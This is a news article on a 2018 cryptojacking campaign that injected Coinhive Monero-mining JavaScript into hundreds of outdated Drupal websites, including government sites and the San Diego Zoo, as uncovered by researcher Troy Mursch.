Cryptojacking Strikes Again! Hackers Target Government Websites to Mine Monero
Cryptojacking, the novel hacking process which inflicts a victim’s computer with code to mine cryptocurrency, is evidently on the rise as hackers have targeted hundreds of popular websites with fraudulent software to mine the fungible digital coin monero (XMR).
“Cryptojacking” A Sophisticated Crime
In 2018 alone, thousands of users have fallen victim to malicious cryptojacking code. Surprisingly, it is not from accessing a “shady” website that causes users to be “cryptojacked,” as hackers are using sophisticated methods, such as masking and mimicking popular websites to trap undoubting users.
The latest incident was unearthed by Bad Packets Report’s researcher Troy Mursch, who unveiled on May 5, 2018, that more than 300 websites have been targets of cryptojacking.
Once again, the infamous browser mining software Coinhive was compromised and used by hackers to mine the cryptocurrency monero, by exploiting an “outdated and vulnerable version” of a Drupal content management software.
According to the post, Mursch was notified about the “crypto-hacked” websites of the government of Chihuahua, Mexico, and San Diego Zoo, after which the cyber-security sprung into action.
#Coinhive found on the website of the San Diego Zoo (@sandiegozoo) in the latest high-profile case of #cryptojacking. pic.twitter.com/B3rd2Q5uVA
— Bad Packets (@bad_packets) May 4, 2018
During his investigation, Mursch observed a similar code in the JavaScript libraries of the affected websites. The code, contained in “/misc/jquery.once.js?v=1.2,” revealed the attacker’s Coinhive domain, where Mursch discovered a changed version of the popular mining software.
(Source: Bad Packets)
Later on, by reverse checking the suspected domain address on IP-checker site WhoIs, Mursch was able to find out the associated email address of the hackers, which was then used to check the world wide web using all common denominators as search parameters.
Looking at the historical DNS records on @securitytrails we find https://t.co/nT3NhaZotQ was recently involved in Monero (XMR) mining operations. So it seems fitting to continue the trend with today's cryptojacking incident using #Coinhive. pic.twitter.com/GfmgUy2gWc
— Bad Packets (@bad_packets) May 4, 2018
Affected sites include the City of Marion, Ohio, the University of Aleppo, and the National Labor Relations Board, Mexico. The full list of affected sites can be accessed on this spreadsheet.
Attacks Possible Due to Coinhive’s JS Usage
Mursch believes that the root cause of Coinhive being the center of a majority of cryptojacking attacks is due to its use of a JavaScript-based program, that is easy to inflict.
Speaking to CoinDesk, Mursch said:
“This is because Coinhive and other cryptojacking services (malware) are simply done with JavaScript. Every modern browser and device can run JavaScript, so as such, everybody can mine cryptocurrency and unfortunately Coinhive has been used and abused time and time again. [In] this particular case, Drupal users need to update [as soon as possible].”
An increasingly common cyber-nuisance, hackers have employed a number of ways to extract money. Amongst them are, as previously reported by BTCManager, holding sensitive data to a cryptocurrency-only ransom, and latching on YouTube Ads to inflict computers.
